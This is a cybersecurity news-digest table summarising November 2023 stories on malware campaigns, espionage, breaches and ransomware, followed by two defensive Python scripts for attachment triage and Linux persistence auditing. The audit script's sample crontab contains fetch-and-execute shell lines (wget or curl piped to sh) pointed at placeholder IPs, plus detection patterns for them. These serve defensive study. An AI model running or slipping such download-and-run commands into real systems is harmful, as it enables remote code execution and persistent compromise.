Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 11752
Checks for new stories every ~15 minutes
| Time | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2023-11-21 11:59:34 | thehackernews | MALWARE | New Agent Tesla Malware Variant Exploits ZPAQ Compression | A new variant of the Agent Tesla malware is distributed in ZPAQ archives to evade detection in email-based attacks. ZPAQ is a rarely used compression format chosen for its high compression ratio and limited software support, which means many security tools cannot unpack and inspect it. Agent Tesla, first observed in 2014, is a .NET-based keylogger and RAT sold as malware-as-a-service and typically delivered through phishing. The recent campaign exploits an old Microsoft Office vulnerability to deliver the payload, a malicious .NET executable inside a ZPAQ archive that is named to look like a PDF. Once run, the executable downloads and decrypts additional files that carry common file extensions to disguise the malicious network traffic. The final Agent Tesla payload is protected with the .NET Reactor obfuscator and uses Telegram for command-and-control (C2). The choice of ZPAQ suggests the attackers are either targeting technically savvy individuals or experimenting with new techniques to spread malware and undermine security controls. | Details |
| 2023-11-21 10:53:00 | theregister | MISCELLANEOUS | Continuous Training Essential for EMEA Cybersecurity Readiness in 2024 | EMEA organizations are encouraged to maintain constant vigilance against cyber threats through continuous training. Cybersecurity professionals need up-to-date knowledge of emerging threats and defense strategies. The SANS Institute offers a comprehensive course library for 2024 to enhance cybersecurity skills across the region. Courses cover a wide array of topics including Cloud Security, DFIR, Offensive Operations, Leadership, OSINT, and ICS, and are available in various formats and locations for both established professionals and career changers. Attendees at SANS events gain practical insights from instructors actively working in cybersecurity and can earn GIAC certifications that validate their expertise. The full catalogue of SANS 2024 EMEA training courses is published for those interested in advancing their cybersecurity knowledge. | Details |
| 2023-11-21 10:42:34 | thehackernews | CYBERCRIME | Advanced Phishing Techniques Employ QR Codes, CAPTCHAs, and Steganography | Cybercriminals are evolving their phishing attacks with QR codes, CAPTCHAs, and steganography to deceive targets and bypass security controls. Quishing (QR-code phishing) embeds malicious links inside QR codes, which pass through email spam filters as images and are harder for security tools to inspect. CAPTCHA-gated attacks place realistic credential-harvesting forms behind a CAPTCHA so that automated scanners and web crawlers never reach the phishing page. In one instance, attackers targeted Halliburton Corporation employees with a CAPTCHA followed by a convincing Office 365 login page to collect credentials. Steganography is used to hide malicious scripts in seemingly innocuous media files such as images, delivered via email attachments or illegitimate download links. ANY.RUN is a sandbox environment providing tools for analysis and detection of these phishing techniques, and its current promotional offer is pitched at defending against these increasingly prevalent tactics. | Details |
| 2023-11-21 10:01:32 | thehackernews | MALWARE | Hackers Leverage Apache Flaw for Crypto Mining and Rootkits | The Kinsing operators are exploiting a critical vulnerability in Apache ActiveMQ to infect Linux systems. Infected systems are abused for illicit cryptocurrency mining, which degrades system performance. The malware has a history of targeting misconfigured container environments to mine for profit on stolen server resources, and the group rapidly adapts to newly disclosed vulnerabilities in web applications. The current campaign uses CVE-2023-46604, a remote code execution flaw, to install the malware. Kinsing gains persistence by registering a rootkit shared library in /etc/ld.so.preload so the dynamic linker loads it into processes system-wide. Organizations running Apache ActiveMQ are urged to update to patched versions. | Details |
| 2023-11-21 07:48:54 | thehackernews | MALWARE | Malicious Apps Imitate Trusted Entities to Steal Data from Indian Users | A new malware campaign targeting Indian Android smartphone users uses socially engineered messages to distribute fraudulent apps. Attackers use messaging platforms, particularly WhatsApp and Telegram, to trick users into installing malicious apps that impersonate banks and government agencies. The fraudulent apps harvest personal information, including banking details, payment card data and account credentials, and can intercept one-time passwords. The campaigns send APK files over these platforms and create urgency by falsely claiming users must update their permanent account number (PAN). Upon installation, the apps request sensitive information and transmit it to a command-and-control server or a specific phone number. The malware can also hide its icon from the home screen and read and send SMS messages to facilitate financial fraud. Variants of the trojan have also targeted credit card details and cryptocurrency wallet information. In response to such threats, Google and Samsung have introduced new security features to protect users against malicious app installations; Android users are reminded to scrutinize app permissions and the legitimacy of app developers. | Details |
| 2023-11-21 07:02:42 | thehackernews | NATION STATE ACTIVITY | Mustang Panda Targets Philippines Amid Tensions over South China Sea | A cyber-espionage campaign linked to the China-based Mustang Panda group targeted a Philippines government entity during heightened South China Sea tensions. Palo Alto Networks' Unit 42 identified three attacks in August 2023, mainly against South Pacific organizations, in which legitimate software was abused to sideload malware. Mustang Panda, known by various aliases, has been active since at least 2012, uses spear-phishing to deliver its payloads, and conducts espionage against NGOs and governments globally. The Philippines government entity was likely compromised over five days in mid-August through a sideloading chain designed to bypass antivirus solutions. The threat actor also disguised its C2 traffic as legitimate Microsoft communications and has consistently demonstrated persistent cyber-espionage capability. Separately, a South Korean APT actor named Higaisa has been observed targeting Chinese users with phishing schemes and Rust-based malware. | Details |
| 2023-11-21 01:06:51 | bleepingcomputer | MISCELLANEOUS | Tor Project Cuts Off Relays Engaged in For-Profit Schemes | The Tor Project recently removed several network relays to protect user safety and network security. Relays are essential for anonymizing traffic in the Tor network, but these had been misused as part of a cryptocurrency scheme. Some relay operators were unaware they were part of a high-risk project, or were operating in dangerous regions. The community has debated relay operation policies and what constitutes a violation. Profit-driven relay operations conflict with Tor's ethos of volunteerism and resistance to internet censorship, and the network could face invasive centralization if for-profit operations scale up significantly. BleepingComputer sought more information from The Tor Project without a response. Unconfirmed reports suggest nearly a thousand blocked relays may be linked to a service known as ATor (AirTor). | Details |
| 2023-11-20 22:33:57 | bleepingcomputer | NATION STATE ACTIVITY | Nation State-Linked Gamaredon Group's USB Malware Spreads Globally | LittleDrifter, a USB-propagating worm, has breached systems beyond Ukraine, reaching countries including the US, Germany, and Vietnam. The worm is attributed to the Russian state-sponsored espionage group Gamaredon and was apparently designed to target Ukrainian entities, but has spread to unintended victims. Check Point's research shows the malware is written in Visual Basic Script (VBS), spreads via USB drives, and has ties to Gamaredon's earlier PowerShell USB worm. Gamaredon, also tracked under aliases such as Shuckworm, has a history of cyber espionage against Ukrainian government, defense, and critical infrastructure. LittleDrifter establishes communication with designated command-and-control (C2) servers and spreads through connected USB drives using deceptive lures. Gamaredon's methodology includes using domain names as placeholders for C2 server IP addresses and rotating them frequently to avoid detection. LittleDrifter's primary objective appears to be establishing a foothold on the infected system, with a fallback to reach the C2 through a Telegram channel if needed. Although no complex follow-on payloads were observed, the findings suggest the attacks are highly targeted, with LittleDrifter serving as the initial foothold ahead of further attack stages. | Details |
| 2023-11-20 20:46:35 | bleepingcomputer | MALWARE | Phobos Ransomware Variant Falsely Implicates VX-Underground Group | A new variant of Phobos ransomware uses the email address of the malware-sharing collective VX-Underground in its ransom note. Phobos is related to the Crysis ransomware family and operates as ransomware-as-a-service, with affiliates conducting the attacks. The latest variant drops a text note and an HTA file for its ransom message, jokingly stating that 'VX-Underground' is not the decryption password. Phobos accounts for 4% of all submissions to the ID Ransomware service in 2023. Other ransomware groups have previously taunted security researchers and communities in similar ways, sometimes escalating into abusive or harmful actions. Misattributing ransomware attacks in this way could be a form of psychological warfare or an attempt to mislead investigators and law enforcement. | Details |
| 2023-11-20 20:41:13 | theregister | DATA BREACH | Over 77 Million Affected by MOVEit Data Breach Incident | A vulnerability in Progress Software's MOVEit file transfer application led to a massive data breach affecting over 2,620 organizations and more than 77 million individuals. The Russian ransomware gang Clop exploited the bug in May, gaining access to and leaking extensive personal data. Avast, among the victims, acknowledges that low-risk personal customer information was accessed but downplays the severity of the breach. Avast is offering affected customers six months of free dark web monitoring alongside a push for an enhanced paid security service, which has drawn customer backlash. Welltok, another MOVEit user, reports that data on over 1.6 million patients, including sensitive health information, was potentially stolen. Impacted entities include major healthcare providers such as Stanford Health Care, Corewell Health, and Sutter Health. Welltok's notification to patients indicates that exposed data may include names, addresses, birth dates, Social Security numbers, and health insurance details, among others. | Details |
| 2023-11-20 19:18:47 | bleepingcomputer | CYBERCRIME | Healthcare Cybersecurity Executive Guilty of Hospital Hacking | Vikas Singla, the former COO of Securolytics, pleaded guilty to conducting cyberattacks in 2018 on two hospitals within Gwinnett Medical Center. The attacks disrupted hospital phone and network printer services and involved stealing over 200 patients' personal information. Singla sought to drum up business for his company from the publicity around the attacks, including using the stolen information in Securolytics' client outreach. The FBI condemned the attacks for jeopardizing patient health and safety, with potentially catastrophic consequences. Singla was initially charged with 17 counts of intentional damage to a protected computer and one count of obtaining information from a protected computer. He faces over $817,000 in restitution to the victims; because of serious health conditions, a 57-month probation sentence is recommended, with sentencing scheduled for February 15, 2024. | Details |
| 2023-11-20 17:25:59 | bleepingcomputer | DATA BREACH | Canadian Government Employee Data Exposed in Contractor Hacks | Two Canadian government contractors, BGRS and SIRVA, suffered cyber breaches that compromised sensitive data. The LockBit ransomware gang claimed responsibility for the attack on SIRVA and leaked 1.5TB of allegedly stolen documents. Personal and financial information of government employees, RCMP members, and Canadian Armed Forces personnel dating back to 1999 is at risk. The Government of Canada responded by offering support services such as credit monitoring and passport reissuance to those affected. A detailed analysis is underway to determine the full scope of the breach and identify all impacted individuals. Affected individuals are advised to update login credentials, enable multi-factor authentication, and monitor their accounts for unusual activity. | Details |
| 2023-11-20 17:20:40 | theregister | CYBERCRIME | Former Security COO Guilty of Hacking Hospitals for Sales Leverage | Vikas Singla, former COO of the cybersecurity firm Securolytics, pleaded guilty to cyberattacks on two hospitals in 2018. Singla intentionally disrupted the Ascom phone system used for critical communications at Gwinnett Medical Center, impacting over 200 devices. The attack also compromised patient data stored on a Hologic R2 Digitizer, with information on over 300 patients stolen. After the attacks, Securolytics began contacting potential clients and using the incidents to market its services. Singla's plea deal recommends 57 months of home detention instead of prison, citing his serious health conditions: he is battling an extraordinary form of cancer and a dangerous vascular condition. Singla is ordered to pay restitution of $817,804.12 to Northside Hospital and an insurance company for the damage caused by his actions. | Details |
| 2023-11-20 16:59:27 | bleepingcomputer | MALWARE | Kinsing Malware Exploits Apache Vulnerability for Cryptojacking | Kinsing malware operators are exploiting CVE-2023-46604, a critical vulnerability in Apache ActiveMQ, for remote code execution on Linux systems. Despite a patch being available since late October, many servers remain vulnerable, and several ransomware groups are also capitalizing on unpatched systems. Kinsing's goal is to deploy cryptocurrency miners; it has previously leveraged other vulnerabilities such as Log4Shell and an Atlassian Confluence RCE bug. The malware uses the Java ProcessBuilder class to execute commands that download additional payloads while evading detection. Before starting to mine, Kinsing eliminates competition by terminating other Monero mining processes, and it establishes persistence through a cron job. Its rootkit shared library is registered in the /etc/ld.so.preload file, so the dynamic linker loads it into every dynamically linked process, giving it system-wide stealth and complicating removal. Organizations remain at risk and are advised to upgrade Apache ActiveMQ to a version patched against the flaw. | Details |
| 2023-11-20 15:47:44 | bleepingcomputer | CYBERCRIME | British Library Struck by Ransomware Attack with Data Auctioned | The Rhysida ransomware gang has claimed responsibility for the October cyberattack on the British Library. The attack caused an extensive IT outage, with the library's systems encrypted and services disrupted for several weeks. Rhysida is auctioning data it claims to have stolen from the library, offering it exclusively to a single buyer with no option for resale. The group released a low-resolution screenshot of purportedly stolen ID scans from the library's systems as proof of the breach. The FBI and CISA had previously warned about Rhysida's attacks across various sectors, describing it as a ransomware-as-a-service (RaaS) operation. The British Library has confirmed that HR documents were leaked and is urging users to change their passwords as a precaution. Its online and onsite services, including Wi-Fi and its website, remain impacted nearly three weeks after the attack. The library holds over 150 million items and adds approximately 3 million new items annually, serving over 11 million online visitors a year and around 16,000 people onsite and online each day. | Details |
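The Agent Tesla entry above (thehackernews, 2023-11-21 11:59) describes a delivery chain that defeats signature scanning in two ways: an archive format the gateway cannot unpack (ZPAQ) and an executable named to look like a PDF. The following Python is an added example, not code from the article or from any vendor, showing how a mail-gateway hook can triage attachments on both properties: a policy list of low-prevalence archive extensions (an assumption to tune locally) and a mismatch between the filename's claimed type and the leading bytes. All sample attachments are constructed for the demo.

```python
"""Attachment triage for the Agent Tesla delivery chain described above.

Added example, not code from the article or from any vendor. Two checks:
  1. archive attachments in formats a typical gateway cannot unpack, which
     should be quarantined or detonated rather than trusted to AV;
  2. a mismatch between what the filename claims and what the leading bytes
     say, e.g. an MZ (PE) executable named *.pdf.
The extension list is a policy assumption; every sample is constructed.
"""
from typing import Dict, List, Optional

# Archive formats rarely seen in business mail (policy assumption, tune locally).
UNCOMMON_ARCHIVE_EXTS = {"zpaq", "arj", "ace", "lzh", "lha"}

# Leading bytes for the content types this triage cares about.
MAGIC = {
    "pdf": b"%PDF-",
    "pe":  b"MZ",          # Windows PE image, which includes .NET assemblies
    "zip": b"PK\x03\x04",  # plain zip and OOXML documents
}

# Extensions under which each content type may legitimately appear.
EXT_FOR_CONTENT = {
    "pdf": {"pdf"},
    "pe":  {"exe", "dll", "scr"},
    "zip": {"zip", "docx", "xlsx", "pptx", "jar"},
}

DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}
EXECUTABLE_EXTS = {"exe", "scr", "com", "bat", "cmd", "js", "vbs", "ps1"}


def extension(name: str) -> str:
    """Last extension, lower-cased, or '' when the name has none."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def sniff(data: bytes) -> Optional[str]:
    """Identify content by magic bytes; None when no known prefix matches."""
    for kind, magic in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def triage_attachment(name: str, data: bytes) -> List[str]:
    """Return human-readable findings; an empty list means nothing stood out."""
    findings: List[str] = []
    ext = extension(name)
    parts = name.lower().split(".")

    if ext in UNCOMMON_ARCHIVE_EXTS:
        findings.append(f"uncommon archive format .{ext}")

    # invoice.pdf.exe style: a document extension in front of a real executable one.
    if len(parts) > 2 and parts[-2] in DOCUMENT_EXTS and parts[-1] in EXECUTABLE_EXTS:
        findings.append("double extension: document name hiding an executable")

    kind = sniff(data)
    if kind is not None and ext not in EXT_FOR_CONTENT[kind]:
        findings.append(f"content is {kind} but name claims .{ext or '(none)'}")
    return findings


# Constructed samples standing in for the outer attachment and for the file an
# unpacker or sandbox would extract from it. The bytes are minimal fakes.
SAMPLES: Dict[str, bytes] = {
    "Quotation_2023.pdf":  b"%PDF-1.7\n%constructed benign document\n",
    "Purchase_Order.zpaq": b"\x00" * 16,                                   # archive we cannot unpack here
    "Purchase_Order.pdf":  b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56,   # PE bytes, named as a PDF
    "statement.pdf.exe":   b"MZ\x90\x00" + b"\x00" * 60,
}


def triage_all(samples: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Triage every attachment and map its name to the findings."""
    return {name: triage_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in triage_all(SAMPLES).items():
        print(f"{name:22} {'; '.join(findings) if findings else 'no findings'}")
```

In a real deployment the archive check is what routes the ZPAQ attachment to a sandbox that can unpack it; the magic check then runs on whatever the sandbox extracts, which is where the PDF-named executable is caught.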
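The two Kinsing entries above (thehackernews, 2023-11-21 10:01 and bleepingcomputer, 2023-11-20 16:59) name two Linux persistence mechanisms: a rootkit shared library forced into every process through /etc/ld.so.preload, and a cron job. The following Python is an added example, not code from either article or from any vendor, that audits both from file contents passed in as strings so it runs offline. The library-directory list, the heuristics and the sample file contents (including the TEST-NET addresses) are assumptions constructed for the demo, not indicators from the articles.

```python
"""Audit of two Linux persistence mechanisms named in the Kinsing entries:
shared objects forced into every process via /etc/ld.so.preload, and cron
jobs that fetch remote content and hand it to a shell.

Added example, not code from the articles or from any vendor. Works on file
contents passed in as strings; the samples at the bottom are constructed.
"""
import re
from typing import List, Tuple

# Directories where preloaded libraries legitimately live on common distros
# (assumption; extend for your baseline, e.g. a sanctioned EDR library path).
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")

SHARED_OBJECT_RE = re.compile(r"\.so(\.\d+)*$")


def parse_preload(content: str) -> List[str]:
    """/etc/ld.so.preload is a whitespace-separated list of shared-object paths."""
    return content.split()


def audit_preload(content: str) -> List[Tuple[str, List[str]]]:
    """Return (path, reasons) for every preload entry that looks out of place.

    On most servers the file should not exist at all, so a non-empty result
    deserves a look even when no individual reason fires.
    """
    findings: List[Tuple[str, List[str]]] = []
    for path in parse_preload(content):
        reasons: List[str] = []
        if not path.startswith(TRUSTED_LIB_DIRS):
            reasons.append("outside standard library directories")
        if any(part.startswith(".") for part in path.split("/") if part):
            reasons.append("hidden path component")
        if not SHARED_OBJECT_RE.search(path):
            reasons.append("name does not look like a shared object")
        if reasons:
            findings.append((path, reasons))
    return findings


# Cron lines that download something and immediately execute it are the classic
# cryptojacker re-infection loop. Two shapes are covered: `curl ... | sh` and
# `sh -c "$(curl ...)"`. Obfuscated variants (base64, hex) are out of scope.
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(ba)?sh\b")
SUBSHELL_RE = re.compile(r"\$\(\s*(curl|wget)\b")


def audit_crontab(content: str) -> List[str]:
    """Return the crontab lines (comments and blanks skipped) that fetch-and-execute."""
    suspicious: List[str] = []
    for line in content.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if DOWNLOAD_RE.search(stripped) and (
            PIPE_TO_SHELL_RE.search(stripped) or SUBSHELL_RE.search(stripped)
        ):
            suspicious.append(stripped)
    return suspicious


# Constructed sample contents; the second preload entry and the last two cron
# lines are the planted bad ones. IPs are from RFC 5737 documentation ranges.
SAMPLE_PRELOAD = "/usr/lib/x86_64-linux-gnu/libasan.so.6\n/tmp/.cache/libsys.so\n"
SAMPLE_CRONTAB = """# constructed demo crontab
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * wget -q -O- http://198.51.100.7/k.sh | sh > /dev/null 2>&1
*/5 * * * * root sh -c "$(curl -fsSL http://203.0.113.9/u.sh)"
"""


if __name__ == "__main__":
    for path, reasons in audit_preload(SAMPLE_PRELOAD):
        print(f"ld.so.preload: {path}: {', '.join(reasons)}")
    for line in audit_crontab(SAMPLE_CRONTAB):
        print(f"crontab: {line}")
```

Against a live host, feed the functions the contents of /etc/ld.so.preload, /etc/crontab, /etc/cron.d/* and each user's crontab; a rootkit that hooks directory listings can hide its own library from `ls`, so read the preload file directly rather than trusting a listing of the directory it points to.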